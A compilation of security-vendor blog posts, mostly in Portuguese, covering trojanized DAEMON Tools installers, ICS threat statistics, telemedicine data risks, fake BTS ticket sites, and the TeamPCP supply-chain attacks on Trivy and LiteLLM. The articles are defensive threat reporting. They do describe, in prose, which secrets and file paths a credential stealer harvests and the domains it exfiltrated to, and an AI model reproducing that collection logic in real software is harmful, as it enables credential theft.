Nossos especialistas descobriram um ataque à cadeia de suprimentos em grande escala via DAEMON Tools – software para emulação de unidades ópticas. Os invasores conseguiram injetar código malicioso nos instaladores do software, e todos os arquivos executáveis trojanizados estão assinados com uma assinatura digital válida da AVB Disc Soft – a desenvolvedora do DAEMON Tools. A versão maliciosa do programa está em circulação desde 8 de abril de 2026. No momento da redação deste artigo, o ataque ainda está em andamento. Os pesquisadores da Kaspersky acreditam que se trata de um ataque direcionado.

Quais são os riscos de instalar a versão maliciosa do DAEMON Tools?

Depois que o software infectado com trojan é instalado no computador da vítima, um arquivo malicioso é executado toda vez que o sistema é inicializado – enviando uma solicitação a um servidor de comando e controle. Em resposta, o servidor pode enviar um comando para baixar e executar cargas maliciosas adicionais.

Primeiro, os invasores implantam um coletor de informações que reúne o endereço MAC, o nome do host, o nome de domínio DNS, listas de processos em execução e de softwares instalados, além das configurações de idioma. O malware então envia essas informações para o servidor de comando e controle.

Em alguns casos, em resposta às informações coletadas, o servidor de comando envia um backdoor minimalista para a máquina da vítima. Ele é capaz de baixar cargas maliciosas adicionais, executar comandos de shell e rodar módulos de shellcode na memória.

O backdoor pode ser usado para implantar um implantado mais sofisticado chamado QUIC RAT. Ele suporta vários protocolos de comunicação com o servidor de comando e controle e é capaz de injetar cargas maliciosas nos processos notepad.exe e conhost.exe.

Informações técnicas mais detalhadas, juntamente com indicadores de comprometimento, podem ser encontradas no artigo dos especialistas no blog Securelist.

Quem está sendo alvo?

Desde o início de abril, foram detectadas várias milhares de tentativas de instalar cargas maliciosas adicionais por meio do software DAEMON Tools infectado. A maioria dos dispositivos infectados pertencia a usuários domésticos, mas aproximadamente 10% das tentativas de instalação foram detectadas em sistemas em execução em organizações. Geograficamente, as vítimas estavam espalhadas por cerca de cem países e territórios diferentes. A maioria das vítimas estava localizada na Rússia, Brasil, Turquia, Espanha, Alemanha, França, Itália e China.

Na maioria das vezes, o ataque se limitava à instalação de um coletor de informações. O backdoor infectou apenas uma dúzia de máquinas em organizações governamentais, científicas e de manufatura, bem como em empresas de varejo na Rússia, Bielorrússia e Tailândia.

O que exatamente foi infectado

O código malicioso foi detectado nas versões do DAEMON Tools que vão da 12.5.0.2421 à 12.5.0.2434. Os invasores comprometeram os arquivos DTHelper.exe, DiscSoftBusServiceLite.exe e DTShellHlp.exe, que estão instalados no diretório principal do DAEMON Tools.

Como se proteger?

Se o software DAEMON Tools for utilizado no seu computador (ou em qualquer outro local da sua organização), nossos especialistas recomendam verificar minuciosamente os computadores nos quais ele está instalado em busca de qualquer atividade incomum a partir de 8 de abril.

Além disso, recomendamos o uso de soluções de segurança confiáveis em todos os computadores domésticos e corporativos usados para acessar a internet. Nossas soluções protegem com sucesso os usuários contra todos os malwares usados no ataque à cadeia de suprimentos via DAEMON Tools.

Statistics across all threats

The percentage of ICS computers on which malicious objects were blocked has been decreasing since the beginning of 2024. In Q4 2025, it was 19.7%. Over the past three years, the percentage has decreased by 1.36 times, and by 1.25 times since Q4 2023.

Percentage of ICS computers on which malicious objects were blocked, Q1 2023–Q4 2025

Regionally, in Q4 2025, the percentage of ICS computers on which malicious objects were blocked ranged from 8.5% in Northern Europe to 27.3% in Africa.

Regions ranked by percentage of ICS computers on which malicious objects were blocked

Four regions saw an increase in the percentage of ICS computers on which malicious objects were blocked. The most notable increases occurred in Southern Europe and South Asia. In Q3 2025, East Asia experienced a sharp increase triggered by the local spread of malicious scripts, but the figure has since returned to normal.

Changes in percentage of ICS computers on which malicious objects were blocked, Q4 2025

Feature of the quarter: worms in email

In Q4 2025, the percentage of ICS computers on which wormsinemailattachments were blocked increasedinallregions of the world.

Many of the blocked threats were related to the worm Backdoor.MSIL.XWorm. This malware is designed to persist on the system and then remotely control it.

Interestingly, this threat was not detected on ICS computers in the previous quarter, yet it appeared in all regions in Q4 2025.

A study found that the active spread of Backdoor.MSIL.XWorm via phishing emails was likely linked to the use by hackers of another malware obfuscation technique that was actively used during massive phishing campaigns in Q4 2025. These campaigns have been known since 2024 as “Curriculum-vitae-catalina”.

The attackers distributed phishing emails to HR managers, recruiters, and employees responsible for hiring. The messages were disguised as responses from job applicants with subjects such as “Resume” or “Attached Resume” and contained a malicious executable file under the guise of a curriculum vitae. Typically, the file was named Curriculum Vitae-Catalina.exe. When executed, it infected the system.

In Q4 2025, the threat spread across regions in two waves — one in October and another in November. Russia, Western Europe, South America, and North America (Canada) were attacked in October. A spike in Backdoor.MSIL.XWorm blocking was observed in other regions in November. The attack subsided in all regions in December.

The highest percentage of ICS computers on which Backdoor.MSIL.XWorm was blocked was observed in regions where threats from email clients had been historically blocked at high rates on ICS computers: Southern Europe, South America, and the Middle East.

At the same time, in Africa, where USB storage media are still actively used, the threat was also detected when removable devices were connected to ICS computers.

Selected industries

The biometrics sector has historically led the rankings of industries and OT infrastructures surveyed in this report in terms of the percentage of ICS computers on which malicious objects were blocked.

These systems are characterized by accessibility to and from the internet, as well as minimal cybersecurity controls by the consumer organization.

Rankings of industries and OT infrastructure by percentage of ICS computers on which malicious objects were blocked

In Q4 2025, the percentage of ICS computers on which malicious objects were blocked increased only in one sector: oil and gas. The corresponding figures increased in two regions: Russia, and Central Asia and the South Caucasus.

However, if we look at a broader time span, there is a downward trend in all the surveyed industries.

Percentage of ICS computers on which malicious objects were blocked in selected industries

Diversity of detected malicious objects

In Q4 2025, Kaspersky protection solutions blocked malware from 10,142 different malware families of various categories on industrial automation systems.

Percentage of ICS computers on which the activity of malicious objects from various categories was blocked

In Q4 2025, there was an increase in the percentage of ICS computers on which worms, and miners in the form of executable files for Windows were blocked. These were the only categories that exhibited an increase.

Main threat sources

Depending on the threat detection and blocking scenario, it is not always possible to reliably identify the source. The circumstantial evidence for a specific source can be the blocked threat’s type (category).

The internet (visiting malicious or compromised internet resources; malicious content distributed via messengers; cloud data storage and processing services and CDNs), email clients (phishing emails), and removable storage devices remain the primary sources of threats to computers in an organization’s technology infrastructure.

In Q4 2025, the percentage of ICS computers on which malicious objects from various sources were blocked decreased. All sources except email clients saw their lowest levels in three years.

Percentage of ICS computers on which malicious objects from various sources were blocked

The same computer can be attacked by several categories of malware from the same source during a quarter. That computer is counted when calculating the percentage of attacked computers for each threat category, but is only counted once for the threat source (we count unique attacked computers). In addition, it is not always possible to accurately determine the initial infection attempt. Therefore, the total percentage of ICS computers on which various categories of threats from a certain source were blocked can exceed the percentage of computers affected by the source itself.

• In Q4 2025, the percentage of ICS computers on which threats from the internet were blocked decreased to 7.67% and reached its lowest level since the beginning of 2023. The main categories of internet threats are malicious scripts and phishing pages, and denylisted internet resources. The percentage ranged from 3.96% in Northern Europe to 11.33% in South Asia.
• The main categories of threats from email clients blocked on ICS computers were malicious scripts and phishing pages, spyware, and malicious documents. Most of the spyware detected in phishing emails was delivered as a password archive or a multi-layered script embedded in office document files. The percentage of ICS computers on which threats from email clients were blocked ranged from 0.64% in Northern Europe to 6.34% in Southern Europe.
• The main categories of threats that were blocked when removable media was connected to ICS computers were worms, viruses, and spyware. The percentage of ICS computers on which threats from removable media were blocked ranged from 0.05% in Australia and New Zealand to 1.41% in Africa.
• The main categories of threats that spread through network folders in Q4 2025 were viruses, AutoCAD malware, worms, and spyware. The percentage of ICS computers on which threats from network folders were blocked ranged from 0.01% in Northern Europe to 0.18% in East Asia.

Threat categories

Typical attacks blocked within an OT network are multi-step sequences of malicious activities, where each subsequent step of the attackers is aimed at increasing privileges and/or gaining access to other systems by exploiting the security problems of industrial enterprises, including OT infrastructures.

Malicious objects used for initial infection

In Q4 2025, the percentage of ICS computers on which denylisted internet resources were blocked decreased to 3.26%. This is the lowest quarterly figure since the beginning of 2022, and it has decreased by 1.8 times since Q2 2025.

Percentage of ICS computers on which denylisted internet resources were blocked, Q1 2023–Q4 2025

Regionally, the percentage of ICS computers on which denylisted internet resources were blocked ranged from 1.74% in Northern Europe to 3.93% in Southeast Asia, which displaced Africa from first place. Russia rounded out the top three regions for this indicator.

The percentage of ICS computers on which malicious documents were blocked increased for three consecutive quarters. However, in Q4 2025 it decreased by 0.22 pp to 1.76%.

Percentage of ICS computers on which malicious documents were blocked, Q1 2023–Q4 2025

Regionally, the percentage ranged from 0.46% in Northern Europe to 3.82% in Southern Europe. In Q4 2025, the indicator increased in Eastern Europe, Russia, and Western Europe.

The percentage of ICS computers on which malicious scripts and phishing pages were blocked decreased to 6.58%. Despite the decline, this category led the rankings of threat categories in terms of the percentage of ICS computers on which they were blocked.

Percentage of ICS computers on which malicious scripts and phishing pages were blocked, Q1 2023–Q4 2025

Regionally, the percentage ranged from 2.52% in Northern Europe to 10.50% in South Asia. The indicator increased in South Asia, South America, Southern Europe, and Africa. South Asia saw the most notable increase, at 3.47 pp.

Next-stage malware

Malicious objects used to initially infect computers deliver next-stage malware — spyware, ransomware, and miners — to victims’ computers. As a rule, the higher the percentage of ICS computers on which the initial infection malware is blocked, the higher the percentage for next-stage malware.

In Q4 2025, the percentage of ICS computers on which spyware, ransomware and web miners were blocked decreased. The rates were:

• Spyware: 3.80% (down 0.24 pp). For the second quarter in a row, spyware took second place in the rankings of threat categories in terms of the percentage of ICS computers on which it was blocked.
• Ransomware: 0.16% (down 0.01 pp).
• Web miners: 0.24% (down 0.01 pp), this is the lowest level observed thus far in the period under review.

The percentage of ICS computers on which miners in the form of executable files for Windows were blocked increased to 0.60% (up 0.03 pp).

Self-propagating malware

Self-propagating malware (worms and viruses) is a category unto itself. Worms and virus-infected files were originally used for initial infection, but as botnet functionality evolved, they took on next-stage characteristics.

To spread across ICS networks, viruses and worms rely on removable media and network folders and are distributed in the form of infected files, such as archives with backups, office documents, pirated games and hacked applications. In rarer and more dangerous cases, web pages with network equipment settings, as well as files stored in internal document management systems, product lifecycle management (PLM) systems, resource management (ERP) systems and other web services are infected.

In Q4 2025, the percentage of ICS computers on which worms were blocked increased by 1.6 times to 1.60%. As mentioned above, this increase is related to a global phishing attack that spread the Backdoor.MSIL.XWorm backdoor worm across all regions of the world. The percentage increased in all regions. The biggest increase (up by 2.16 times) was in Southern Europe. The malware was primary distributed through email clients, and Southern Europe led the way in terms of the percentage of ICS computers on which threats from email clients were blocked.

The percentage of ICS computers on which viruses were blocked decreased to 1.33%.

AutoCAD malware

This category of malware can spread in a variety of ways, so it does not belong to a specific group.

After an increase in the previous quarter, the percentage of ICS computers on which AutoCAD malware was blocked decreased to 0.29% in Q4 2025.

For more information on industrial threats see the full version of the report.

Muitas pessoas veem a telemedicina como uma das maiores conquistas do avanço científico: é possível, basicamente, ter uma consulta médica em cinco minutos, sem sair do sofá. Mas há um porém…

Dados médicos são vendidos na dark web ou em mercados ilegais por valores dezenas de vezes superiores aos de informações de cartão de crédito ou credenciais de redes sociais. Diferentemente de um cartão de crédito, que pode ser bloqueado e substituído, não é possível “reiniciar” seu histórico médico. Seu nome, data de nascimento, endereço, telefone, número do plano de saúde, diagnósticos, resultados de exames, prescrições e planos de tratamento permanecem relevantes por anos. Isso representa uma verdadeira mina de ouro para usos que vão desde marketing direcionado até chantagem, fraude ou roubo de identidade.

E, com o avanço da IA, a Internet está agora repleta de sites falsos que alegam oferecer serviços médicos, mas que, na verdade, são projetados para extrair dados confidenciais de vítimas desavisadas. Hoje, vamos explorar quais informações médicas estão em risco, por que invasores desejam esses dados e como você pode impedir esse tipo de ameaça.

Mais valiosos do que dados de cartões de crédito

Criminosos monetizam dados médicos roubados tanto em grande escala quanto por meio de vendas individuais. A primeira ação geralmente é exigir pagamento de resgate das organizações invadidas. (De fato, em 2024, 91% dos vazamentos de dados de saúde relacionados a malware nos Estados Unidos foram resultado de ataques de ransomware). Posteriormente, os dados vazados passam a ser utilizados em ataques direcionados e personalizados. Eles permitem que invasores construam um perfil médico da vítima (quais medicamentos ela compra, com que frequência e quais utiliza de forma contínua) para, então, vender essas informações para a indústria farmacêutica ou para profissionais de marketing, ou utilizá-las em golpes de phishing direcionado, como a oferta de um suposto tratamento inovador. Os criminosos também podem chantagear pacientes com base em diagnósticos sensíveis ou usar essas informações para obter prescrições de substâncias controladas de forma fraudulenta. Além disso, seguradoras também têm grande interesse nesses dados. Essas empresas analisam tais informações para aumentar o valor dos prêmios de seguro de saúde ou, em alguns casos, até negar cobertura. Em resumo, existem inúmeras formas de usar esses dados contra você.

Qual é gravidade disso tudo na prática?

O maior vazamento de dados médicos da história aconteceu em fevereiro de 2024, quando o grupo de hackers BlackCat invadiu os sistemas da empresa de assistência médica Change Healthcare. A empresa é uma divisão do UnitedHealth Group, responsável por processar cerca de 15 bilhões de transações de seguros por ano e atuar como intermediária financeira entre pacientes, prestadores de serviços de saúde e seguradoras.

Durante nove dias, os invasores circularam livremente pelos sistemas internos da Change Healthcare, extraindo seis terabytes de dados confidenciais antes de, finalmente, executar o ataque de ransomware. Para conter a propagação do malware, a UnitedHealth precisou tirar completamente do ar os data centers da Change Healthcare e acabou pagando um resgate de 22 milhões de dólares aos criminosos. O ataque praticamente paralisou o sistema de saúde dos Estados Unidos. O número de vítimas foi revisado três vezes: inicialmente 100 milhões, depois 190 milhões, até chegar ao total final de impressionantes 192,7 milhões de pessoas, com prejuízos estimados em 2,9 bilhões de dólares. E a causa (do lado da Change Healthcare) desse incidente de grandes proporções, que analisamos em detalhe em outro conteúdo, foi simplesmente… a ausência de autenticação em dois fatores em um portal de acesso remoto via desktop.

Antes disso, a startup de telemedicina em saúde mental Cerebral incorporou ferramentas de rastreamento de terceiros diretamente em seu site e aplicativos. Como resultado, os dados de 3,2 milhões de pacientes (incluindo nomes, históricos médicos e de prescrições, além de informações de seguro) foram compartilhados com plataformas como LinkedIn, Snapchat e TikTok. A Comissão Federal de Comércio dos Estados Unidos aplicou à empresa uma multa de 7,1 milhões de dólares e impôs uma medida inédita: a proibição do uso de dados médicos para fins publicitários. Vale mencionar que a mesma startup também ganhou destaque negativo ao enviar aos clientes cartões promocionais sem envelope, expondo nomes e mensagens que facilitavam a identificação do diagnóstico por qualquer pessoa.

Por que a telemedicina é tão vulnerável

Vamos analisar os principais pontos de fragilidade dos serviços de telemedicina.

• Rastreadores de anúncios em aplicativos de saúde. Ferramentas de rastreamento de empresas como Facebook, TikTok e Snapchat frequentemente já vêm integradas às plataformas de telemedicina, permitindo o compartilhamento de dados dos pacientes com anunciantes sem que os usuários tenham conhecimento.
• Canais de comunicação não seguros. Em alguns casos, médicos se comunicam com pacientes por meio de aplicativos de mensagens comuns, em vez de plataformas médicas certificadas. Embora seja prático, isso pode ser ilegal para a clínica e totalmente inseguro para o paciente.
• Vulnerabilidades nas plataformas. Plataformas de telemedicina estão sujeitas a ataques clássicos da Web, como injeção de SQL (que permite a extração de bancos de dados completos de pacientes), sequestro de sessão e interceptação de dados quando a criptografia da conexão é fraca ou inexistente.
• Treinamento insuficiente das equipes. Nossas pesquisas indicam que 30% dos médicos já lidaram com comprometimento de dados de pacientes especificamente durante atendimentos por telemedicina, e 42% dos profissionais de saúde não compreendem plenamente como os dados dos pacientes são protegidos.
• Dispositivos médicos desatualizados. Muitos dispositivos médicos vestíveis (como monitores cardíacos ou medidores de pressão arterial) utilizam um protocolo de transmissão de dados antigo chamado MQTT. Esse protocolo apresenta vulnerabilidades que podem permitir a invasores acessar informações sensíveis ou até interferir no funcionamento dos dispositivos.

Spam e phishing na telemedicina

Invasores não são os únicos interessados na área da saúde já que spammers e golpistas também atuam fortemente nesse segmento. Eles oferecem “serviços médicos” com promessas boas demais para serem verdade, enviam e-mails sobre supostas mudanças no seu plano de saúde ou divulgam “tratamentos milenares do Himalaia”. Naturalmente, todos os links enviados levam a sites suspeitos, que oferecem produtos ou serviços duvidosos.

Se você acabar acessando um site de phishing como esses, os golpistas vão tentar extrair o máximo possível de dados pessoais: fotos de documentos, apólice do seguro, prescrições médicas e, em alguns casos… até imagens de partes do corpo sob o pretexto de avaliação clínica. A partir daí, essas informações podem ser vendidas na dark web ou usadas em esquemas de chantagem, extorsão e novos ataques de phishing. Para entender melhor como funciona essa cadeia clandestina de dados, vale explorar o conteúdo: O que acontece com os dados roubados por meio de phishing?

Como regra geral, sites de clínicas falsas costumam omitir a seção de política de privacidade e bombardear você com ofertas “somente hoje” que parecem boas demais para ser verdade. Ao mesmo tempo, com o avanço da IA, criar um site com aparência profissional, praticamente indistinguível de um legítimo, se tornou extremamente fácil. Já não é necessário ter habilidades de design nem domínio do idioma da vítima. Por isso, recomendamos a utilização da nossa solução de segurança completa, que foi projetada para detectar spam, golpes e phishing e alertar você sobre sites falsos antes mesmo de acessá-los.

Dicas de segurança para pacientes de telemedicina

• Crie um e-mail exclusivo para serviços de saúde. Se esse endereço vazar após um incidente de segurança em uma clínica, fica muito mais difícil para golpistas conectarem essas informações ao restante da sua vida digital.
• Evite usar login com Google, Apple ou redes sociais. Manter os acessos separados dificulta a associação entre seus dados médicos e suas contas pessoais.
• Verifique qual plataforma será usada na consulta. Se a clínica sugerir uma ligação ou conversa por aplicativos de mensagens comuns, desconfie. O mais seguro é utilizar um portal do paciente oficial, com comunicação criptografada.
• Nunca envie documentos médicos por aplicativos de mensagem ou redes sociais. Resultados de exames, laudos e prontuários devem ser enviados exclusivamente pelo portal oficial da clínica.
• Use senhas únicas e fortes para cada conta. Seu acesso ao portal governamental, ao sistema da clínica e ao aplicativo de agendamento médico deve ter senhas diferentes. O Kaspersky Password Manager pode gerar e armazenar todas elas com segurança, além de monitorar vazamentos de dados e alertar caso alguma de suas contas seja comprometida.
• Ative a autenticação em dois fatores. Priorize serviços governamentais e instituições de saúde. Recomendamos o uso de aplicativos autenticadores em vez de códigos por SMS, pois são mais seguros e totalmente anônimos. O Kaspersky Password Manager pode ajudar nesse processo.
• Compartilhe apenas o necessário. Não se sinta obrigado a preencher todos os campos opcionais em aplicativos médicos ou em sites. Quanto menos dados um serviço armazenar, menor será o vazamento.
• Tenha cuidado ao compartilhar informações de saúde nas mídias sociais ou em aplicativos de bate-papo. Os golpistas adoram explorar as pessoas quando elas estão vulneráveis. Por exemplo, em 2024, invasores conquistaram a confiança do desenvolvedor do XZ Utils, que havia compartilhado publicamente questões de esgotamento e depressão. Eles o convenceram a ceder o controle da ferramenta, que depois foi comprometida com código malicioso. Como o XZ Utils é amplamente utilizado em sistemas Linux e impacta o OpenSSH (um protocolo de acesso remoto a servidores), o ataque poderia ter afetado uma parcela significativa da Internet se não tivesse sido detectado a tempo.
• Não instale aplicativos de telemedicina de desenvolvedores desconhecidos. Verifique as avaliações e dedique um momento para revisar a política de privacidade. Até mesmo plataformas consolidadas podem compartilhar seus dados com terceiros.
• Acompanhe seus registros médicos. Prescrições incomuns, consultas que você não realizou ou medicamentos desconhecidos podem ser sinais de que sua conta foi comprometida.
• Configure e mantenha atualizados seus dispositivos de saúde. Monitores de atividade física, medidores de pressão arterial, balanças inteligentes e outros dispositivos de monitoramento de atividades enviam dados pela Internet. Configurações inadequadas ou vulnerabilidades não corrigidas facilitam a ocorrência de vazamentos de dados.

O que mais você precisa saber sobre como proteger sua saúde on-line:

• Vazamento de dados mentais: vulnerabilidades em aplicativos de saúde mental
• Descubra por que os corretores de dados criam dossiês sobre você e como impedir que eles façam isso
• Interações com bots podem resultar em tragédias
• Privacidade em aplicativos de saúde reprodutiva
• Cinco problemas da “telessaúde”

O BTS, um fenômeno global do K-pop, retornou aos palcos recentemente após um hiato de quase quatro anos: os membros do grupo estavam cumprindo o serviço militar obrigatório na Coreia do Sul. Por esse motivo, não é surpresa que os cibercriminosos tenham se aproveitado da tão esperada turnê mundial da banda, ARIRANG, para lançar uma campanha de sites falsos visando fãs ansiosos pela compra de ingressos.

Identificamos pelo menos 10 domínios fraudulentos que imitam as páginas oficiais de pré-venda para os shows da banda no Brasil, França, Espanha, Portugal, Argentina, México, Peru, Chile e Colômbia, todos criados no início de abril. Neste artigo, explicamos exatamente como os golpistas operam e como evitar a compra de ingressos falsos.

Como funciona o golpe dos ingressos falsos

Devido à alta demanda por ingressos para a turnê mundial, alguns dos organizadores do evento prepararam medidas adicionais para garantir que não haja cambistas. No Brasil, os serviços de venda de ingressos adotaram um formato de “pré-reserva”: o usuário primeiro faz uma reserva online e depois paga pessoalmente na bilheteria. Embora justificada, a mudança causou confusão entre os fãs e criou uma oportunidade para que criminosos cometessem fraudes.

Os golpistas criam páginas quase idênticas às oficiais, replicando o layout, o design e todo o processo de compra – para usuários comuns, a experiência parece totalmente legítima. Os links para esses sites estão circulando nas redes sociais, principalmente no Instagram.

No Brasil, as vítimas são solicitadas a efetuar pagamentos via PIX, o sistema de pagamentos instantâneos operado pelo Banco Central do Brasil. Em alguns casos, os sites chegam a simular uma opção de pagamento com cartão, mas alegam alta demanda ou erros no sistema para pressionar os usuários a escolherem o PIX. Os pagamentos via PIX são então direcionados para contas laranja, dificultando a recuperação dos fundos.

Esse golpe é um exemplo perfeito de como funciona a engenharia social. Ele se aproveita de uma base de fãs enorme e altamente engajada, levando muitos usuários a agir de forma impulsiva. Os falsos “erros” que o site exibe durante o pagamento criam uma sensação de urgência e causam pânico – golpistas sabem muito bem com que rapidez os ingressos do BTS se esgotam. Além disso, as dúvidas sobre o novo sistema de compra estabelecido pelos organizadores do evento ajudam os criminosos a tornar os sites falsos ainda mais convincentes.

Como se proteger contra golpes de ingressos

Para realmente conseguir ingressos para o show do seu grupo favorito – e não cair vítima de golpistas –, é importante ter em mente estas regras básicas de segurança cibernética:

• Acesse apenas serviços oficiais de venda de ingressos, que você pode encontrar na página oficial dedicada à turnê do BTS. Digite o endereço do site diretamente no seu navegador e evite links recebidos por mensagens, redes sociais ou e-mail.
• Verifique o domínio com cuidado. Pequenas alterações no endereço geralmente indicam fraude. Isso inclui traços adicionais, domínios territoriais incomuns e alterações imperceptíveis, como substituir o “l” minúsculo pelo “I” maiúsculo.
• Verifique se o site possui páginas de Política de Privacidade e Termos de Uso. Se elas estiverem faltando, você definitivamente está visitando um site falso. Mas lembre-se: a presença dessas páginas não garante que o site seja legítimo. Com a IA moderna, gerar essas páginas leva apenas alguns segundos.
• Verifique cuidadosamente o formato de venda para cada país. No Brasil, o pagamento só deve ser feito pessoalmente, portanto, qualquer solicitação de pagamento online durante a pré-venda é um forte indício de golpe. Outros países e organizadores de eventos podem oferecer pagamentos online.
• Se você foi vítima de um golpe, entre em contato imediatamente com seu banco. Se você forneceu informações do cartão de crédito aos criminosos, deve solicitar a reemissão do cartão para evitar novos pagamentos não autorizados.
• Ative os alertas bancários. Notificações em tempo real permitem que você identifique rapidamente transações suspeitas.
• Use uma proteção de segurança cibernética que detecta e bloqueia automaticamente sites fraudulentos. Kaspersky Premium, nossa solução robusta de segurança cibernética, também bloqueia tentativas de phishing, protege seus dados pessoais e ajuda a proteger sua identidade.
• Cuidado com ingressos “gratuitos” ou com “desconto“. No fim das contas, não existe almoço grátis – especialmente quando se trata de grupos musicais mundialmente famosos.

Mais sobre golpes:

• Phishing e spam: as campanhas mais ousadas de 2025
• Como phishers e golpistas usam IA
• Trojan para Android que simula serviços governamentais e aplicativos da Starlink
• Mais 8 dicas para identificar golpistas online
• Conheça cinco sinais de alerta de golpes online

Milhões de pipelines de desenvolvimento de software automatizados dependem de ferramentas de segurança, como Trivy e Checkmarx AST, integradas ao processo de compilação. E foram essas soluções confiáveis que recentemente se tornaram o ponto de entrada para um dos maiores e mais perigosos ataques contra a cadeia de suprimentos da história moderna. Nesta postagem, discutiremos como auditar os fluxos de trabalho automatizados e como proteger a infraestrutura de nuvem corporativa.

Linha do tempo do ataque e as consequências conhecidas

Em 19 de março, um ataque direcionado e bem-sucedido contra a cadeia de suprimentos foi realizado por meio do Trivy, uma ferramenta de verificação de vulnerabilidades de código aberto amplamente usada em pipelines de CI/CD. Os invasores, um grupo conhecido como TeamPCP, conseguiram injetar malware nos fluxos de trabalho oficiais do GitHub Actions e nas imagens do Docker associadas ao Trivy. Com isso, cada verificação automatizada de pipeline feita acionou um malware que roubou chaves SSH, tokens de acesso à nuvem, carteiras de criptomoedas e outros dados valiosos dos sistemas comprometidos. Dada a natureza crítica do incidente, o identificador CVE-2026-33634 foi atribuído a ele, com uma pontuação CVSS4B, praticamente máxima, de 9,4.

Mais tarde, naquele mesmo dia, a equipe do Trivy detectou o ataque, removeu os artefatos maliciosos dos canais de distribuição e interrompeu aquela fase do ataque. No entanto, os invasores já tinham conseguido acessar os ambientes de muitos usuários do Trivy.

Em 23 de março, um incidente semelhante foi descoberto em outra ferramenta de segurança do aplicativo: um GitHub Action para Checkmarx KICS, e também, para Checkmarx AST. Três horas depois, o código malicioso foi então removido do ambiente. O TeamPCP também conseguiu comprometer as extensões do OpenVSX compatíveis com Checkmarx: cx-dev-assist 1.7.0 e ast-results. Os relatórios que indicam quando ocorreu o momento da resolução dessa parte do incidente variam.

Em 24 de março, um projeto popular que usa a verificação de código do Trivy (o gateway LiteLLM AI, que nada mais é do que uma biblioteca universal para acesso a vários provedores de LLM) foi atacado. As versões 1.82.7 e 1.82.8, carregadas no repositório PyPI, foram comprometidas. Essas versões ficaram disponíveis publicamente por cerca de cinco horas.

Mas o fato do ataque ter durado apenas algumas horas não é motivo para desconsiderar o evento. Dada a popularidade dos projetos afetados, o código malicioso pode ter sido executado milhares de vezes, inclusive dentro da infraestrutura de empresas muito grandes.

Isso permitiu que os invasores não só implementassem backdoors persistentes em clusters do Kubernetes, mas também iniciassem o CanisterWorm autorreplicante no ecossistema npm do JavaScript.

O código dos invasores tem recursos destrutivos que eliminam um cluster Kubernetes, e todos os seus nós, se o fuso horário de Teerã ou o farsi for detectado como idioma principal no sistema comprometido. Em outras regiões, o malware simplesmente rouba dados com o uso do CanisterWorm.

De acordo com especialistas, mais de 20 mil repositórios são considerados suscetíveis a ataques. Os invasores alegam ter roubado centenas de gigabytes de dados e mais de 500 mil contas.

Como o Trivy foi atacado

Para comprometer o Trivy, os invasores usaram as credenciais roubadas em um incidente anterior. O comprometimento anterior do Trivy, ocorrido no final de fevereiro, provavelmente não foi contido de forma plena, e os invasores, ou seja, o mesmo grupo TeamPCP, retornaram com um novo ataque. A Aqua Security, por meio de sua equipe de desenvolvedores do Trivy, especula que, como as credenciais estavam sendo eliminadas gradualmente após o incidente anterior, os invasores conseguiram gerar novos tokens de acesso para si mesmos antes que os antigos comprometidos fossem revogados.

Com isso, os invasores do grupo TeamPCP conseguiram comprometer o GitHub Actions usado em pipelines de CI/CD. Com o uso de credenciais com privilégios de gravação de tags, os invasores forçaram a substituição de 76 das 77 tags de versão no aquasecurity/trivy-action, além de todas as 7 tags no aquasecurity/setup-trivy, e redirecionaram as versões confiáveis existentes para as versões maliciosas. Essa tática de ataque se assemelha com as táticas observadas na campanha Shai-Hulud 2.0. Com isso, os fluxos de trabalho em todo o pipeline começaram a executar o código dos invasores, porém, os metadados da versão não mostravam as alterações visíveis.

Paralelamente a isso, os invasores publicaram um binário Trivy infectado (v0.69.4) nos canais de distribuição oficiais, inclusive com versões do GitHub e registros de contêiner.

Comprometimento da ferramenta LiteLLM

O comprometimento da popular ferramenta de acesso ao modelo de linguagem LiteLLM pode desencadear, por si só, uma grande onda de ataques em toda a cadeia de projetos que utiliza o recurso. O ataque ocorreu em 24 de março de 2026, quando os invasores do TeamPCP publicaram diretamente as versões maliciosas da biblioteca (1.82.7 e 1.82.8) no PyPI. Entre 10:39 UTC e 16:00 UTC, esses pacotes comprometidos continham malware que roubava credenciais. Ele foi integrado no arquivo proxy_server.py, e a versão 1.82.8 também continha um arquivo litellm_init malicioso. Os dados roubados foram exfiltrados para o servidor models.litellm[.]cloud.

Os clientes que usam o LiteLLM Cloud ou a imagem oficial do LiteLLM Proxy Docker não foram afetados devido ao bloqueio estrito da versão, enquanto os desenvolvedores e os projetos de downstream que instalaram as versões não fixadas pelo pip, durante a janela de tempo especificada, foram comprometidos.

Em três horas, os pacotes maliciosos foram removidos do repositório PyPI, e a equipe do LiteLLM suspendeu as novas versões, atualizou as credenciais e envolveu um processo externo de resposta a incidentes. As equipes que usam o LiteLLM em seus projetos são aconselhadas a verificar imediatamente o indicador de comprometimento litellm_init.pth e atualizar rotineiramente todos os segredos que possam estar comprometidos.

Recursos do malware TeamPCP Cloud Stealer

Os invasores adicionaram uma nova lógica ao GitHub Actions, ao executável do Trivy e preservaram a funcionalidade original. Os resultados da verificação de vulnerabilidades por meio do Trivy pareciam normais, mas, ao mesmo tempo, dados valiosos estavam sendo pesquisados e extraídos. O código malicioso atuava da seguinte maneira:

• realizando reconhecimento (coletando dados de rede e variáveis de ambiente);
• procurando tokens e credenciais para acessar ambientes de nuvem AWS e GCP;
• verificando a memória (/proc/*/mem ) para extrair segredos armazenados na memória dos processos Runner.Worker e Runner.Listener;
• extraindo segredos do Kubernetes (/run/secrets/kubernetes.io/serviceaccount);
• coletando dados para conexão com servidores de banco de dados (MySQL, PostgreSQL, MongoDB, Redis, Vault);
• coletando quaisquer outras chaves e segredos de API de arquivos de ambiente e arquivos de configuração de CI/CD (.env, .json, .yml);
• pesquisando webhooks para canais Slack e Discord;
• procurando dados relativos às carteiras de criptomoedas (variáveis relativas ao blockchain Solana, além de dados rpcuser e rpcpassword).

Os dados coletados foram criptografados e carregados em um servidor com um nome semelhante ao dos desenvolvedores do Trivy (scan.aquasecurtiy[.]org). Como se fosse um mecanismo de backup, os invasores forneceram um método para carregar os dados em um repositório denominado docs-tpcp.

O ataque ao CheckMarx e ao LiteLLM usou uma tática semelhante aos outros domínios de typosquatting: models.litellm[.]cloud e checkmarx[.]zone.

Uma análise técnica detalhada do malware, juntamente com indicadores de comprometimento, pode ser encontrada no artigo de nosso especialista no blog Securelist.

Estratégias de resposta e defesa ao CVE-2026-33634

